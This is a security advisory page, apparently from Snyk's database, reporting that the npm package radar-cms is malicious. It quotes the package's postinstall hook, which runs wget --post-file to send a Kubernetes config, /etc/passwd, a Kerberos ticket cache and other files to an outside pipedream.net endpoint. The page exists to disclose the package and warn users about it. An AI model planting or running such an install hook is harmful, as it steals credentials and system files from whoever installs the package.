radar-cms@0.0.1-security vulnerabilities

security holding package

  • latest version

    0.0.1-security

  • first published

    3 years ago

  • latest version published

    3 years ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the radar-cms package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • C
    Malicious Package

    radar-cms is a malicious package. The package was found to have a post-install command which when executed will exfiltrate multiple files from a host machine.

    PoC

    "postinstall": "wget --post-file ~/.kube/config https://entfet95itcxpuu.m.pipedream.net;wget 
    --post-file package.json https://entfet95itcxpuu.m.pipedream.net;wget --post-file /etc/passwd 
    https://entfet95itcxpuu.m.pipedream.net;wget --post-file /tmp/krb5cc_0
     https://entfet95itcxpuu.m.pipedream.net;wget --post-file /etc/hosts 
    https://entfet95itcxpuu.m.pipedream.net"
    

    How to fix Malicious Package?

    Avoid using all malicious instances of the radar-cms package.

    *